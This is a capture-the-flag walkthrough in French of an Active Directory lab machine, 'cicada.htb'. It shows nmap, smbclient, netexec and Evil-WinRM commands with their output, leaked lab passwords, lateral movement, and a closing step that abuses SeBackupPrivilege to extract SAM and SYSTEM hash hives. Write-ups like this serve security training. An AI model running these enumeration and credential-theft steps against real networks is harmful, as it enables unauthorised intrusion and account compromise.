~ $ nmap -A -Pn 10.129.231.149
Starting Nmap 7.98 ( https://nmap.org ) at 2026-02-17 09:46 +0100
Nmap scan report for 10.129.231.149
Host is up (0.023s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-02-17 15:47:03Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb, Site: Default-First-Site-Name)
|_ssl-date: 2026-02-17T15:48:23+00:00; +7h00m00s from scanner time.
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb, Site: Default-First-Site-Name)
|_ssl-date: 2026-02-17T15:48:23+00:00; +7h00m00s from scanner time.
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb, Site: Default-First-Site-Name)
|_ssl-date: 2026-02-17T15:48:23+00:00; +7h00m00s from scanner time.
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb, Site: Default-First-Site-Name)
|_ssl-date: 2026-02-17T15:48:23+00:00; +7h00m00s from scanner time.
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: CICADA-DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 6h59m59s, deviation: 0s, median: 6h59m59s
| smb2-time:
| date: 2026-02-17T15:47:45
|_ start_date: N/A
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 91.72 seconds
le port smb est ouvert donc je tente d'énumérer les partages authentification pour voir si des permissions ont été mal configurées.
~ $ smbclient -L cicada.htb -U anonymous
Can't load /etc/samba/smb.conf - run testparm to debug it
Password for [WORKGROUP\anonymous]:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
DEV Disk
HR Disk
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
SMB1 disabled -- no workgroup available
HR (Ressources Humaines) semble être une cible intéressante pour trouver des documents sensibles.
smbclient //10.129.231.149/HR -N
smb: \> ls
. D 0 Thu Mar 14 13:29:09 2024
.. D 0 Thu Mar 14 13:21:29 2024
Notice from HR.txt A 1266 Wed Aug 28 19:31:48 2024
smb: \> get "Notice from HR.txt"
le document contient le mot de passe par défaut.
~/Documents/Ctf/Htb/en_cours $ cat Notice\ from\ HR.txt
Dear new hire!
Welcome to Cicada Corp! We're thrilled to have you join our team. As part of our security protocols, it's essential that you change your default password to something unique and secure.
Your default password is: Cicada$M6Corpb*@Lp#nZp!8
To change your password:
1. Log in to your Cicada Corp account** using the provided username and the default password mentioned above.
2. Once logged in, navigate to your account settings or profile settings section.
3. Look for the option to change your password. This will be labeled as "Change Password".
4. Follow the prompts to create a new password**. Make sure your new password is strong, containing a mix of uppercase letters, lowercase letters, numbers, and special characters.
5. After changing your password, make sure to save your changes.
Remember, your password is a crucial aspect of keeping your account secure. Please do not share your password with anyone, and ensure you use a complex password.
If you encounter any issues or need assistance with changing your password, don't hesitate to reach out to our support team at support@cicada.htb.
Thank you for your attention to this matter, and once again, welcome to the Cicada Corp team!
Best regards,
Cicada Corp
Cicada$M6Corpb*@Lp#nZp!8
Pour tester ce mot de passe, j’ai d'abord besoin d'une liste d'utilisateurs valides du domaine que je fais via bruteforce des rid.
je liste tous les objets de l’anuaire ldap qui sont liés a cet utilisateur michael.wrightson.
~/Documents/Ctf/Htb/en_cours $ nxc ldap 10.129.231.149 -u 'michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8' --users --groups --computers
LDAP 10.129.231.149 389 CICADA-DC [*] Windows Server 2022 Build 20348 (name:CICADA-DC) (domain:cicada.htb) (signing:None) (channel binding:Never)
LDAP 10.129.231.149 389 CICADA-DC [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8
LDAP 10.129.231.149 389 CICADA-DC [*] Enumerated 8 domain users: cicada.htb
LDAP 10.129.231.149 389 CICADA-DC -Username- -Last PW Set- -BadPW- -Description-
LDAP 10.129.231.149 389 CICADA-DC Administrator 2024-08-26 22:08:03 0 Built-in account for administering the computer/domain
LDAP 10.129.231.149 389 CICADA-DC Guest 2024-08-28 19:26:56 0 Built-in account for guest access to the computer/domain
LDAP 10.129.231.149 389 CICADA-DC krbtgt 2024-03-14 12:14:10 0 Key Distribution Center Service Account
LDAP 10.129.231.149 389 CICADA-DC john.smoulder 2024-03-14 13:17:29 2
LDAP 10.129.231.149 389 CICADA-DC sarah.dantelia 2024-03-14 13:17:29 2
LDAP 10.129.231.149 389 CICADA-DC michael.wrightson 2024-03-14 13:17:29 0
LDAP 10.129.231.149 389 CICADA-DC david.orelious 2024-03-14 13:17:29 2 Just in case I forget my password is aRt$Lp#7t*VQ!3
LDAP 10.129.231.149 389 CICADA-DC emily.oscars 2024-08-22 23:20:17 2
LDAP 10.129.231.149 389 CICADA-DC -Group- -Members- -Description-
LDAP 10.129.231.149 389 CICADA-DC Administrators 3 Administrators have complete and unrestricted access to the computer/domain
LDAP 10.129.231.149 389 CICADA-DC Users 3 Users are prevented from making accidental or intentional system-wide changes and can run most applications
LDAP 10.129.231.149 389 CICADA-DC Guests 2 Guests have the same access as members of the Users group by default, except for the Guest account which is further restricted
LDAP 10.129.231.149 389 CICADA-DC Print Operators 0 Members can administer printers installed on domain controllers
LDAP 10.129.231.149 389 CICADA-DC Backup Operators 2 Backup Operators can override security restrictions for the sole purpose of backing up or restoring files
LDAP 10.129.231.149 389 CICADA-DC Replicator 0 Supports file replication in a domain
LDAP 10.129.231.149 389 CICADA-DC Remote Desktop Users 0 Members in this group are granted the right to logon remotely
LDAP 10.129.231.149 389 CICADA-DC Network Configuration Operators 0 Members in this group can have some administrative privileges to manage configuration of networking features
LDAP 10.129.231.149 389 CICADA-DC Performance Monitor Users 0 Members of this group can access performance counter data locally and remotely
LDAP 10.129.231.149 389 CICADA-DC Performance Log Users 0 Members of this group may schedule logging of performance counters, enable trace providers, and collect event traces both locally and via remote access to this computer
LDAP 10.129.231.149 389 CICADA-DC Distributed COM Users 0 Members are allowed to launch, activate and use Distributed COM objects on this machine.
LDAP 10.129.231.149 389 CICADA-DC IIS_IUSRS 1 Built-in group used by Internet Information Services.
LDAP 10.129.231.149 389 CICADA-DC Cryptographic Operators 0 Members are authorized to perform cryptographic operations.
LDAP 10.129.231.149 389 CICADA-DC Event Log Readers 0 Members of this group can read event logs from local machine
LDAP 10.129.231.149 389 CICADA-DC Certificate Service DCOM Access 1 Members of this group are allowed to connect to Certification Authorities in the enterprise
LDAP 10.129.231.149 389 CICADA-DC RDS Remote Access Servers 0 Servers in this group enable users of RemoteApp programs and personal virtual desktops access to these resources. In Internet-facing deployments, these servers are typically deployed in an edge network. This group needs to be populated on servers running RD Connection Broker. RD Gateway servers and RD Web Access servers used in the deployment need to be in this group.
LDAP 10.129.231.149 389 CICADA-DC RDS Endpoint Servers 0 Servers in this group run virtual machines and host sessions where users RemoteApp programs and personal virtual desktops run. This group needs to be populated on servers running RD Connection Broker. RD Session Host servers and RD Virtualization Host servers used in the deployment need to be in this group.
LDAP 10.129.231.149 389 CICADA-DC RDS Management Servers 0 Servers in this group can perform routine administrative actions on servers running Remote Desktop Services. This group needs to be populated on all servers in a Remote Desktop Services deployment. The servers running the RDS Central Management service must be included in this group.
LDAP 10.129.231.149 389 CICADA-DC Hyper-V Administrators 0 Members of this group have complete and unrestricted access to all features of Hyper-V.
LDAP 10.129.231.149 389 CICADA-DC Access Control Assistance Operators 0 Members of this group can remotely query authorization attributes and permissions for resources on this computer.
LDAP 10.129.231.149 389 CICADA-DC Remote Management Users 1 Members of this group can access WMI resources over management protocols (such as WS-Management via the Windows Remote Management service). This applies only to WMI namespaces that grant access to the user.
LDAP 10.129.231.149 389 CICADA-DC Storage Replica Administrators 0 Members of this group have complete and unrestricted access to all features of Storage Replica.
LDAP 10.129.231.149 389 CICADA-DC Domain Computers 0 All workstations and servers joined to the domain
LDAP 10.129.231.149 389 CICADA-DC Domain Controllers 0 All domain controllers in the domain
LDAP 10.129.231.149 389 CICADA-DC Schema Admins 1 Designated administrators of the schema
LDAP 10.129.231.149 389 CICADA-DC Enterprise Admins 1 Designated administrators of the enterprise
LDAP 10.129.231.149 389 CICADA-DC Cert Publishers 0 Members of this group are permitted to publish certificates to the directory
LDAP 10.129.231.149 389 CICADA-DC Domain Admins 1 Designated administrators of the domain
LDAP 10.129.231.149 389 CICADA-DC Domain Users 0 All domain users
LDAP 10.129.231.149 389 CICADA-DC Domain Guests 0 All domain guests
LDAP 10.129.231.149 389 CICADA-DC Group Policy Creator Owners 1 Members in this group can modify group policy for the domain
LDAP 10.129.231.149 389 CICADA-DC RAS and IAS Servers 0 Servers in this group can access remote access properties of users
LDAP 10.129.231.149 389 CICADA-DC Server Operators 0 Members can administer domain servers
LDAP 10.129.231.149 389 CICADA-DC Account Operators 0 Members can administer domain user and group accounts
LDAP 10.129.231.149 389 CICADA-DC Pre-Windows 2000 Compatible Access 1 A backward compatibility group which allows read access on all users and groups in the domain
LDAP 10.129.231.149 389 CICADA-DC Incoming Forest Trust Builders 0 Members of this group can create incoming, one-way trusts to this forest
LDAP 10.129.231.149 389 CICADA-DC Windows Authorization Access Group 1 Members of this group have access to the computed tokenGroupsGlobalAndUniversal attribute on User objects
LDAP 10.129.231.149 389 CICADA-DC Terminal Server License Servers 0 Members of this group can update user accounts in Active Directory with information about license issuance, for the purpose of tracking and reporting TS Per User CAL usage
LDAP 10.129.231.149 389 CICADA-DC Allowed RODC Password Replication Group 0 Members in this group can have their passwords replicated to all read-only domain controllers in the domain
LDAP 10.129.231.149 389 CICADA-DC Denied RODC Password Replication Group 8 Members in this group cannot have their passwords replicated to any read-only domain controllers in the domain
LDAP 10.129.231.149 389 CICADA-DC Read-only Domain Controllers 0 Members of this group are Read-Only Domain Controllers in the domain
LDAP 10.129.231.149 389 CICADA-DC Enterprise Read-only Domain Controllers 0 Members of this group are Read-Only Domain Controllers in the enterprise
LDAP 10.129.231.149 389 CICADA-DC Cloneable Domain Controllers 0 Members of this group that are domain controllers may be cloned.
LDAP 10.129.231.149 389 CICADA-DC Protected Users 0 Members of this group are afforded additional protections against authentication security threats. See http://go.microsoft.com/fwlink/?LinkId=298939 for more information.
LDAP 10.129.231.149 389 CICADA-DC Key Admins 0 Members of this group can perform administrative actions on key objects within the domain.
LDAP 10.129.231.149 389 CICADA-DC Enterprise Key Admins 0 Members of this group can perform administrative actions on key objects within the forest.
LDAP 10.129.231.149 389 CICADA-DC DnsAdmins 0 DNS Administrators Group
LDAP 10.129.231.149 389 CICADA-DC DnsUpdateProxy 0 DNS clients who are permitted to perform dynamic updates on behalf of some other clients (such as DHCP servers).
LDAP 10.129.231.149 389 CICADA-DC Groups 0
LDAP 10.129.231.149 389 CICADA-DC Dev Support 0
LDAP 10.129.231.149 389 CICADA-DC [*] Total records returned: 1
LDAP 10.129.231.149 389 CICADA-DC CICADA-DC$
~/Documents/Ctf/Htb/en_cours $
LDAP 10.129.231.149 389 CICADA-DC david.orelious 2024-03-14 13:17:29 2 Just in case I forget my password is aRt$Lp#7t*VQ!3
david.orelious:aRt$Lp#7t*VQ!3 j’utilise ces identifiants pour faire un mouvement latéral et me connecter au partage DEV.
~/Documents/Ctf/Htb/en_cours $ smbclient //10.129.231.149/DEV -U 'david.orelious%aRt$Lp#7t*VQ!3'
Can't load /etc/samba/smb.conf - run testparm to debug it
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Mar 14 13:31:39 2024
.. D 0 Thu Mar 14 13:21:29 2024
Backup_script.ps1 A 601 Wed Aug 28 19:28:22 2024
4168447 blocks of size 4096. 475475 blocks available
smb: \> get Backup_script.ps1
getting file \Backup_script.ps1 of size 601 as Backup_script.ps1 (6,8 KiloBytes/sec) (average 6,8 KiloBytes/sec)
smb: \> exit
~/Documents/Ctf/Htb/en_cours $ cat Backup_script.ps1
$sourceDirectory = "C:\smb"
$destinationDirectory = "D:\Backup"
$username = "emily.oscars"
$password = ConvertTo-SecureString "Q!3@Lp#M6b*7t*Vt" -AsPlainText -Force
$credentials = New-Object System.Management.Automation.PSCredential($username, $password)
$dateStamp = Get-Date -Format "yyyyMMdd_HHmmss"
$backupFileName = "smb_backup_$dateStamp.zip"
$backupFilePath = Join-Path -Path $destinationDirectory -ChildPath $backupFileName
Compress-Archive -Path $sourceDirectory -DestinationPath $backupFilePath
Write-Host "Backup completed successfully. Backup file saved to: $backupFilePath"
j’effectue un énième mouvement latéral vers le user cible :
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA> whoami /all
USER INFORMATION
----------------
User Name SID
=================== =============================================
cicada\emily.oscars S-1-5-21-917908876-1423158569-3159038727-1601
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
========================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Backup Operators Alias S-1-5-32-551 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Certificate Service DCOM Access Alias S-1-5-32-574 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.
SeBackupPrivilege permet de copier n'importe quel fichier sur le système, même s'il est protégé par des ACL, car il est conçu pour les logiciels de sauvegarde.
J’utilise ce privilège pour extraire les ruches SAM (Security Account Manager) et SYSTEM. Ces fichiers contiennent les hashes des mots de passe des comptes locaux.
